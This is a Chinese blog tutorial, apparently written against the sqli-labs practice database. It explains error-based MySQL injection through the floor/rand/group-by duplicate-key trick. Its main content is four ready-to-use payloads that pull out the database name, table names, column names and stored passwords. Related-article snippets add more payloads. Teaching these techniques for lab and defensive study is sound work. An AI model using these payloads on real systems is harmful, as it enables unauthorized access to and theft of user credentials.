SQL注入——报错型注入

最新推荐文章于 2024-06-06 19:11:19 发布
最新推荐文章于 2024-06-06 19:11:19 发布
阅读量587 收藏 1
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41554179/article/details/88413941
版权

报错型sql注入

  • 报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。
  • 语句:

 - AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
   CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES
   WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM
   INFORMATION_SCHEMA.TABLES GROUP BY x)a)  //库名
  
 - AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
   CONCAT(CAST(group_concat(table_name)AS CHAR),0x7e)) FROM
   INFORMATION_SCHEMA.TABLES WHERE table_schema=‘security’ LIMIT
   0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) 
   //表名
 - AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
   CONCAT(CAST(group_concat(column_name)AS CHAR),0x7e)) FROM
   INFORMATION_SCHEMA.COLUMNS WHERE TABLE_name = 'users' and
   table_schema = 'security' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM
   INFORMATION_SCHEMA.TABLES GROUP BY x)a)  //列名
  
 - AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT
   CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users
   LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY
   x)a) //数据(这个构造数据只能一个一个爆出来,通过limit函数控制)
滑稽的炸薯条
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入初学——松风1
08-03
在URL中,如`http://www.example.com/xxx.php?id=4`,如果直接在参数`id`后添加一个单引号 `'`,如`http://www.example.com/xxx.php?id=4'`,会导致MySQL报错,表明存在SQL注入漏洞。这是因为单引号在SQL中用于标识...
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 2万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
sql注入——报错注入
m0_73756016的博客
10-18 1711
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
Sql注入-报错注入
最新发布
WolvenSec的博客
06-06 943
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
【web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入报错注入
报错注入详解
weixin_45253622的博客
03-19 1万+
报错注入 报错注入SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的报错信息 报错函数 1、floor报错注入 floor()报错注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
报错注入
weixin_30883271的博客
06-27 1554
1、通过floor报错,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 2、通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, ...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
第六节 GET报错注入-01
09-15
【第六节 GET报错注入-01】是关于Web安全中的一个常见攻击手段——报错注入的讲解。报错注入主要是利用应用程序在处理查询时,因错误反馈信息过于详细而暴露敏感数据的一种方法。通常,它涉及到SQL查询的嵌套结构,...
sql无效字符 执行sql语句报错解决方案
09-10
预编译语句(PreparedStatement)是用于多次执行相同或相似SQL语句的方式,它们能提高效率并防止SQL注入攻击。 当使用Java的PreparedStatement对象执行SQL时,例如: ```java String sql="INSERT INTO ASE_SYSTEM_...
字符注入报错注入
Dug123456_的博客
04-03 2331
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符注入
SQL注入报错注入
qq_43348375的博客
04-01 512
sql注入报错注入
SQL注入-报错注入
LJH1999ZN的博客
02-09 1万+
sql注入报错注入的演示与介绍
Web安全:SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2444
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
web安全入门之SQL注入-报错注入
weixin_43726831的博客
09-12 1153
SQL注入报错注入法 1.报错注入分析 报错注入法适用于无回显数据的场景,适合于没有显示位的web页面,但是有mysql报错输出的场景。metasploitable2-Linux在Less-5和Less-6中就用到了报错注入方法 这种页面有明显的三种场景 场景1:正确查询成功场景为结果显示。 场景2:正确查询失败场景为空,不显示。 场景3:错误语句查询场景,显示报错语句。 在这种情况下...
SQL注入报错注入
Forget_liu的博客
06-10 1658
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
JDBC应用技术(七)
最慢的步伐不是跬步,而是徘徊;最快的脚步不是冲刺,而是坚持
12-23 7326
单选题 1.下列关闭顺序正确的是() A、resultSet.close();statement.close();connection.close(); B、statement.close();connection.close();resultSet.close(); C、resultSet.close();connection.close();...
最详细的SQL注入报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句中updatexml函数的使用是否正确,确保参数数量和类正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入等安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值